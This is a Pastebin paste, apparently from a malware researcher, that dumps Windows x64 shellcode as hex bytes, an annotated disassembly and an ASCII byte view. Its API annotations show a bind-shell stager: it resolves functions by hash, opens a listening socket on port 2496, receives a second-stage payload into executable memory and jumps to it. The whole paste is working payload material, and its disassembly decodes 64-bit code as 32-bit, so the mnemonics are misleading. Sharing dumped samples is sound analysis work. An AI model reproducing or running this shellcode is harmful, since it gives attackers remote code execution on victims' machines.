API tools faq
paste
James_inthe_box

Dumped

James_inthe_box
Feb 2nd, 2018
144
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.48 KB | None | 0 0
raw download clone embed print report
  1. Hex dump: fc 48 81 e4 f0 ff ff ff e8 cc 00 00 00 41 51 41 50 52 51 56 48 31 d2 65 48 8b 52 60 48 8b 52 18 48 8b 52 20 48 8b 72 50 48 0f b7 4a 4a 4d 31 c9 48 31 c0 ac 3c 61 7c 02 2c 20 41 c1 c9 0d 41 01 c1 e2 ed 52 41 51 48 8b 52 20 8b 42 3c 48 01 d0 66 81 78 18 0b 02 0f 85 72 00 00 00 8b 80 88 00 00 00 48 85 c0 74 67 48 01 d0 50 8b 48 18 44 8b 40 20 49 01 d0 e3 56 48 ff c9 41 8b 34 88 48 01 d6 4d 31 c9 48 31 c0 ac 41 c1 c9 0d 41 01 c1 38 e0 75 f1 4c 03 4c 24 08 45 39 d1 75 d8 58 44 8b 40 24 49 01 d0 66 41 8b 0c 48 44 8b 40 1c 49 01 d0 41 8b 04 88 48 01 d0 41 58 41 58 5e 59 5a 41 58 41 59 41 5a 48 83 ec 20 41 52 ff e0 58 41 59 5a 48 8b 12 e9 4b ff ff ff 5d 49 be 77 73 32 5f 33 32 00 00 41 56 49 89 e6 48 81 ec a0 01 00 00 49 89 e5 48 31 c0 50 50 49 c7 c4 02 00 c0 09 41 54 49 89 e4 4c 89 f1 41 ba 4c 77 26 07 ff d5 4c 89 ea 68 01 01 00 00 59 41 ba 29 80 6b 00 ff d5 6a 02 59 50 50 4d 31 c9 4d 31 c0 48 ff c0 48 89 c2 41 ba ea 0f df e0 ff d5 48 89 c7 6a 10 41 58 4c 89 e2 48 89 f9 41 ba c2 db 37 67 ff d5 48 31 d2 48 89 f9 41 ba b7 e9 38 ff ff d5 4d 31 c0 48 31 d2 48 89 f9 41 ba 74 ec 3b e1 ff d5 48 89 f9 48 89 c7 41 ba 75 6e 4d 61 ff d5 48 81 c4 b0 02 00 00 48 83 ec 10 48 89 e2 4d 31 c9 6a 04 41 58 48 89 f9 41 ba 02 d9 c8 5f ff d5 48 83 c4 20 5e 6a 40 41 59 68 00 10 00 00 41 58 48 89 f2 48 31 c9 41 ba 58 a4 53 e5 ff d5 48 89 c3 49 89 c7 4d 31 c9 49 89 f0 48 89 da 48 89 f9 41 ba 02 d9 c8 5f ff d5 48 01 c3 48 29 c6 48 85 f6 75 e1 41 ff e7 58
  2. 0x00000000 fc cld
  3. 0x00000001 48 dec eax
  4. 0x00000002 81e4f0ffffff and esp,0xfffffff0
  5. 0x00000008 e8cc000000 call 0x000000d9
  6. 0x0000000d 41 inc ecx
  7. 0x0000000e 51 push ecx
  8. 0x0000000f 41 inc ecx
  9. 0x00000010 50 push eax
  10. 0x00000011 52 push edx
  11. 0x00000012 51 push ecx
  12. 0x00000013 56 push esi
  13. 0x00000014 48 dec eax
  14. 0x00000015 31d2 xor edx,edx
  15. 0x00000017 6548 gs: dec eax
  16. 0x00000019 8b5260 mov edx,dword [edx + 96]
  17. 0x0000001c 48 dec eax
  18. 0x0000001d 8b5218 mov edx,dword [edx + 24]
  19. 0x00000020 48 dec eax
  20. 0x00000021 8b5220 mov edx,dword [edx + 32]
  21. 0x00000024 48 dec eax
  22. 0x00000025 8b7250 mov esi,dword [edx + 80]
  23. 0x00000028 48 dec eax
  24. 0x00000029 0fb74a4a movzx ecx,word [edx + 74]
  25. 0x0000002d 4d dec ebp
  26. 0x0000002e 31c9 xor ecx,ecx
  27. 0x00000030 48 dec eax
  28. 0x00000031 31c0 xor eax,eax
  29. 0x00000033 ac lodsb
  30. 0x00000034 3c61 cmp al,97
  31. 0x00000036 7c02 jl 0x0000003a
  32. 0x00000038 2c20 sub al,32
  33. 0x0000003a 41 inc ecx
  34. 0x0000003b c1c90d ror ecx,13
  35. 0x0000003e 41 inc ecx
  36. 0x0000003f 01c1 add ecx,eax
  37. 0x00000041 e2ed loop 0x00000030
  38. 0x00000043 52 push edx
  39. 0x00000044 41 inc ecx
  40. 0x00000045 51 push ecx
  41. 0x00000046 48 dec eax
  42. 0x00000047 8b5220 mov edx,dword [edx + 32]
  43. 0x0000004a 8b423c mov eax,dword [edx + 60]
  44. 0x0000004d 48 dec eax
  45. 0x0000004e 01d0 add eax,edx
  46. 0x00000050 668178180b02 cmp word [eax + 24],523
  47. 0x00000056 0f8572000000 jnz 0x000000ce
  48. 0x0000005c 8b8088000000 mov eax,dword [eax + 136]
  49. 0x00000062 48 dec eax
  50. 0x00000063 85c0 test eax,eax
  51. 0x00000065 7467 jz 0x000000ce
  52. 0x00000067 48 dec eax
  53. 0x00000068 01d0 add eax,edx
  54. 0x0000006a 50 push eax
  55. 0x0000006b 8b4818 mov ecx,dword [eax + 24]
  56. 0x0000006e 44 inc esp
  57. 0x0000006f 8b4020 mov eax,dword [eax + 32]
  58. 0x00000072 49 dec ecx
  59. 0x00000073 01d0 add eax,edx
  60. 0x00000075 e356 jecxz 0x000000cd
  61. 0x00000077 48 dec eax
  62. 0x00000078 ffc9 dec ecx
  63. 0x0000007a 41 inc ecx
  64. 0x0000007b 8b3488 mov esi,dword [eax + ecx * 4]
  65. 0x0000007e 48 dec eax
  66. 0x0000007f 01d6 add esi,edx
  67. 0x00000081 4d dec ebp
  68. 0x00000082 31c9 xor ecx,ecx
  69. 0x00000084 48 dec eax
  70. 0x00000085 31c0 xor eax,eax
  71. 0x00000087 ac lodsb
  72. 0x00000088 41 inc ecx
  73. 0x00000089 c1c90d ror ecx,13
  74. 0x0000008c 41 inc ecx
  75. 0x0000008d 01c1 add ecx,eax
  76. 0x0000008f 38e0 cmp al,ah
  77. 0x00000091 75f1 jnz 0x00000084
  78. 0x00000093 4c dec esp
  79. 0x00000094 034c2408 add ecx,dword [esp + 8]
  80. 0x00000098 45 inc ebp
  81. 0x00000099 39d1 cmp ecx,edx
  82. 0x0000009b 75d8 jnz 0x00000075
  83. 0x0000009d 58 pop eax
  84. 0x0000009e 44 inc esp
  85. 0x0000009f 8b4024 mov eax,dword [eax + 36]
  86. 0x000000a2 49 dec ecx
  87. 0x000000a3 01d0 add eax,edx
  88. 0x000000a5 6641 inc ecx
  89. 0x000000a7 8b0c48 mov ecx,dword [eax + ecx * 2]
  90. 0x000000aa 44 inc esp
  91. 0x000000ab 8b401c mov eax,dword [eax + 28]
  92. 0x000000ae 49 dec ecx
  93. 0x000000af 01d0 add eax,edx
  94. 0x000000b1 41 inc ecx
  95. 0x000000b2 8b0488 mov eax,dword [eax + ecx * 4]
  96. 0x000000b5 48 dec eax
  97. 0x000000b6 01d0 add eax,edx
  98. 0x000000b8 41 inc ecx
  99. 0x000000b9 58 pop eax
  100. 0x000000ba 41 inc ecx
  101. 0x000000bb 58 pop eax
  102. 0x000000bc 5e pop esi
  103. 0x000000bd 59 pop ecx
  104. 0x000000be 5a pop edx
  105. 0x000000bf 41 inc ecx
  106. 0x000000c0 58 pop eax
  107. 0x000000c1 41 inc ecx
  108. 0x000000c2 59 pop ecx
  109. 0x000000c3 41 inc ecx
  110. 0x000000c4 5a pop edx
  111. 0x000000c5 48 dec eax
  112. 0x000000c6 83ec20 sub esp,32
  113. 0x000000c9 41 inc ecx
  114. 0x000000ca 52 push edx
  115. 0x000000cb ffe0 jmp eax
  116. 0x000000cd 58 pop eax
  117. 0x000000ce 41 inc ecx
  118. 0x000000cf 59 pop ecx
  119. 0x000000d0 5a pop edx
  120. 0x000000d1 48 dec eax
  121. 0x000000d2 8b12 mov edx,dword [edx]
  122. 0x000000d4 e94bffffff jmp 0x00000024
  123. 0x000000d9 5d pop ebp
  124. 0x000000da 49 dec ecx
  125. 0x000000db be7773325f mov esi,0x5f327377--> '_2sw'
  126. 0x000000e0 3332 xor esi,dword [edx]
  127. 0x000000e2 0000 add byte [eax],al
  128. 0x000000e4 41 inc ecx
  129. 0x000000e5 56 push esi
  130. 0x000000e6 49 dec ecx
  131. 0x000000e7 89e6 mov esi,esp
  132. 0x000000e9 48 dec eax
  133. 0x000000ea 81eca0010000 sub esp,416
  134. 0x000000f0 49 dec ecx
  135. 0x000000f1 89e5 mov ebp,esp
  136. 0x000000f3 48 dec eax
  137. 0x000000f4 31c0 xor eax,eax
  138. 0x000000f6 50 push eax
  139. 0x000000f7 50 push eax
  140. 0x000000f8 49 dec ecx
  141. 0x000000f9 c7c40200c009 mov esp,0x09c00002
  142. 0x000000ff 41 inc ecx
  143. 0x00000100 54 push esp
  144. 0x00000101 49 dec ecx
  145. 0x00000102 89e4 mov esp,esp
  146. 0x00000104 4c dec esp
  147. 0x00000105 89f1 mov ecx,esi
  148. 0x00000107 41 inc ecx
  149. 0x00000108 ba4c772607 mov edx,0x0726774c--> '&wL'
  150. 0x0000010d ffd5 call ebp --> kernel32.dll!LoadLibraryA
  151. 0x0000010f 4c dec esp
  152. 0x00000110 89ea mov edx,ebp
  153. 0x00000112 6801010000 push 257
  154. 0x00000117 59 pop ecx
  155. 0x00000118 41 inc ecx
  156. 0x00000119 ba29806b00 mov edx,0x006b8029--> 'k)'
  157. 0x0000011e ffd5 call ebp --> ws2_32.dll!WSAStartup
  158. 0x00000120 6a02 push 2
  159. 0x00000122 59 pop ecx
  160. 0x00000123 50 push eax
  161. 0x00000124 50 push eax
  162. 0x00000125 4d dec ebp
  163. 0x00000126 31c9 xor ecx,ecx
  164. 0x00000128 4d dec ebp
  165. 0x00000129 31c0 xor eax,eax
  166. 0x0000012b 48 dec eax
  167. 0x0000012c ffc0 inc eax
  168. 0x0000012e 48 dec eax
  169. 0x0000012f 89c2 mov edx,eax
  170. 0x00000131 41 inc ecx
  171. 0x00000132 baea0fdfe0 mov edx,0xe0df0fea
  172. 0x00000137 ffd5 call ebp --> ws2_32.dll!WSASocketA
  173. 0x00000139 48 dec eax
  174. 0x0000013a 89c7 mov edi,eax
  175. 0x0000013c 6a10 push 16
  176. 0x0000013e 41 inc ecx
  177. 0x0000013f 58 pop eax
  178. 0x00000140 4c dec esp
  179. 0x00000141 89e2 mov edx,esp
  180. 0x00000143 48 dec eax
  181. 0x00000144 89f9 mov ecx,edi
  182. 0x00000146 41 inc ecx
  183. 0x00000147 bac2db3767 mov edx,0x6737dbc2--> 'g7'
  184. 0x0000014c ffd5 call ebp --> ws2_32.dll!bind
  185. 0x0000014e 48 dec eax
  186. 0x0000014f 31d2 xor edx,edx
  187. 0x00000151 48 dec eax
  188. 0x00000152 89f9 mov ecx,edi
  189. 0x00000154 41 inc ecx
  190. 0x00000155 bab7e938ff mov edx,0xff38e9b7
  191. 0x0000015a ffd5 call ebp --> ws2_32.dll!listen
  192. 0x0000015c 4d dec ebp
  193. 0x0000015d 31c0 xor eax,eax
  194. 0x0000015f 48 dec eax
  195. 0x00000160 31d2 xor edx,edx
  196. 0x00000162 48 dec eax
  197. 0x00000163 89f9 mov ecx,edi
  198. 0x00000165 41 inc ecx
  199. 0x00000166 ba74ec3be1 mov edx,0xe13bec74--> ';t'
  200. 0x0000016b ffd5 call ebp --> ws2_32.dll!accept
  201. 0x0000016d 48 dec eax
  202. 0x0000016e 89f9 mov ecx,edi
  203. 0x00000170 48 dec eax
  204. 0x00000171 89c7 mov edi,eax
  205. 0x00000173 41 inc ecx
  206. 0x00000174 ba756e4d61 mov edx,0x614d6e75--> 'aMnu'
  207. 0x00000179 ffd5 call ebp --> ws2_32.dll!closesocket
  208. 0x0000017b 48 dec eax
  209. 0x0000017c 81c4b0020000 add esp,688
  210. 0x00000182 48 dec eax
  211. 0x00000183 83ec10 sub esp,16
  212. 0x00000186 48 dec eax
  213. 0x00000187 89e2 mov edx,esp
  214. 0x00000189 4d dec ebp
  215. 0x0000018a 31c9 xor ecx,ecx
  216. 0x0000018c 6a04 push 4
  217. 0x0000018e 41 inc ecx
  218. 0x0000018f 58 pop eax
  219. 0x00000190 48 dec eax
  220. 0x00000191 89f9 mov ecx,edi
  221. 0x00000193 41 inc ecx
  222. 0x00000194 ba02d9c85f mov edx,0x5fc8d902
  223. 0x00000199 ffd5 call ebp --> ws2_32.dll!recv
  224. 0x0000019b 48 dec eax
  225. 0x0000019c 83c420 add esp,32
  226. 0x0000019f 5e pop esi
  227. 0x000001a0 6a40 push 64
  228. 0x000001a2 41 inc ecx
  229. 0x000001a3 59 pop ecx
  230. 0x000001a4 6800100000 push 4096
  231. 0x000001a9 41 inc ecx
  232. 0x000001aa 58 pop eax
  233. 0x000001ab 48 dec eax
  234. 0x000001ac 89f2 mov edx,esi
  235. 0x000001ae 48 dec eax
  236. 0x000001af 31c9 xor ecx,ecx
  237. 0x000001b1 41 inc ecx
  238. 0x000001b2 ba58a453e5 mov edx,0xe553a458--> 'SX'
  239. 0x000001b7 ffd5 call ebp --> kernel32.dll!VirtualAlloc
  240. 0x000001b9 48 dec eax
  241. 0x000001ba 89c3 mov ebx,eax
  242. 0x000001bc 49 dec ecx
  243. 0x000001bd 89c7 mov edi,eax
  244. 0x000001bf 4d dec ebp
  245. 0x000001c0 31c9 xor ecx,ecx
  246. 0x000001c2 49 dec ecx
  247. 0x000001c3 89f0 mov eax,esi
  248. 0x000001c5 48 dec eax
  249. 0x000001c6 89da mov edx,ebx
  250. 0x000001c8 48 dec eax
  251. 0x000001c9 89f9 mov ecx,edi
  252. 0x000001cb 41 inc ecx
  253. 0x000001cc ba02d9c85f mov edx,0x5fc8d902
  254. 0x000001d1 ffd5 call ebp --> ws2_32.dll!recv
  255. 0x000001d3 48 dec eax
  256. 0x000001d4 01c3 add ebx,eax
  257. 0x000001d6 48 dec eax
  258. 0x000001d7 29c6 sub esi,eax
  259. 0x000001d9 48 dec eax
  260. 0x000001da 85f6 test esi,esi
  261. 0x000001dc 75e1 jnz 0x000001bf
  262. 0x000001de 41 inc ecx
  263. 0x000001df ffe7 jmp edi
  264. 0x000001e1 58 pop eax
  265.  
  266. Byte Dump:
  267. .H...........AQAPRQVH1.eH.R`H.R.H.RH.rPH..JJM1.H1..<a|.,A..A....RAQH.R.B<H..f.x....r.........H..tgH..P.H.D.@I...VH..A.4.H..M1.H1..A..A..8.u.L.L$.E9.u.XD.@$I..fA.HD.@.I..A...H..AXAX^YZAXAYAZH..AR..XAYZH...K...]I.ws2_32..AVI..H......I..H1.PPI.....ATI..L..A.Lw&...L..h....YA.).k...j.YPPM1.M1.H..H..A.......H..j.AXL..H..A...7g..H1.H..A...8...M1.H1.H..A.t.;...H..H..A.unMa..H......H...H..M1.j.AXH..A...._..H..^j@AYh....AXH..H1.A.X.S...H..I..M1.I..H..H..A...._..H..H).H..u.A..X
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!